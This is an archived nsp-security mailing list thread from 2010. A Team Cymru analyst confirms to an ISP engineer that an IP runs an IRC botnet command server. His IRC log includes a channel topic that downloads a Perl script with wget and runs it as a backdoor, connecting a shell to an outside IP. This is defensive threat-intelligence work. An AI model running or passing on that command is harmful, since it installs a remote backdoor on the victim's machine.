[nsp-sec] 72.55.133.149

Stephen Gill gillsr at cymru.com
Wed May 5 11:41:41 EDT 2010 

Looks naughty:

:Pucioasa.RO.EU.Undernet.Org 001 foo :Welcome to the Internet Relay Network
foo
:Pucioasa.RO.EU.Undernet.Org 002 foo :Your host is
Pucioasa.RO.EU.Undernet.Org, running version beware1.5.7
:Pucioasa.RO.EU.Undernet.Org 003 foo :This server was created Tue Jul 13
2004 at 20:36:17 GMT
:Pucioasa.RO.EU.Undernet.Org 004 foo Pucioasa.RO.EU.Undernet.Org beware1.5.7
dgikoswx biklmnoprstv
:Pucioasa.RO.EU.Undernet.Org 005 foo MAP SILENCE=15 WHOX WALLCHOPS
WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=45 :are
supported by this server
:Pucioasa.RO.EU.Undernet.Org 005 foo NICKLEN=12 TOPICLEN=160 AWAYLEN=160
KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst
CASEMAPPING=rfc1459 :are supported by this server
:Pucioasa.RO.EU.Undernet.Org 251 foo :There are 2 users and 52 invisible on
1 servers
:Pucioasa.RO.EU.Undernet.Org 252 foo 1 :operator(s) online
:Pucioasa.RO.EU.Undernet.Org 254 foo 2 :channels formed
:Pucioasa.RO.EU.Undernet.Org 255 foo :I have 54 clients and 0 servers
:Pucioasa.RO.EU.Undernet.Org NOTICE foo :Highest connection count: 64 (64
clients)
:Pucioasa.RO.EU.Undernet.Org 422 foo :MOTD File is missing
:Pucioasa.RO.EU.Undernet.Org NOTICE foo :on 1 ca 1(4) ft 10(10)
LIST
:Pucioasa.RO.EU.Undernet.Org 321 foo Channel :Users  Name
:Pucioasa.RO.EU.Undernet.Org 322 foo #drone 5 :
:Pucioasa.RO.EU.Undernet.Org 322 foo #flood 48 :cd /tmp;wget
arkstock.com/help/inc/dc.txt;perl dc.txt 76.74.156.155 23
:Pucioasa.RO.EU.Undernet.Org 323 foo :End of /LIST


Dc.txt is a backdoor, instructed to connect to 76.74.156.155 23 and spawn a
shell.

-- steve


On 5/5/10 8:27 AM, "Chris Calvert" <Chris.Calvert at telus.com> wrote:

> ----------- nsp-security Confidential --------
> 
> Can anyone (incl Team Cymru) comment on what they are seeing regarding these
> entries in the rsv2 and dnsrr lists?
> 
> 32613 | IWEB-AS - iWeb Technologies Inc. | 72.55.133.149   | tcp  | 6667  |
> 2010-04-27 22:51:50 | 2010-05-05 22:51:50 | bot | 0 | 1 | ID:
> Pucioasa.RO.EU.Undernet.ORG
> 
> fedora.unixcod.com                       BOTNET  A      72.55.133.149
> 32613  2010-04-26 02:31:49  STALE   TCP 6667
> 
> The host is a webhosting platform, and there is legitimate content hosted at
> the IP. I want to make sure it is a definite source of badness.
> 
> Thanks,
> 
> Chris
> TELUS - AS852
> 
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com

More information about the nsp-security mailing list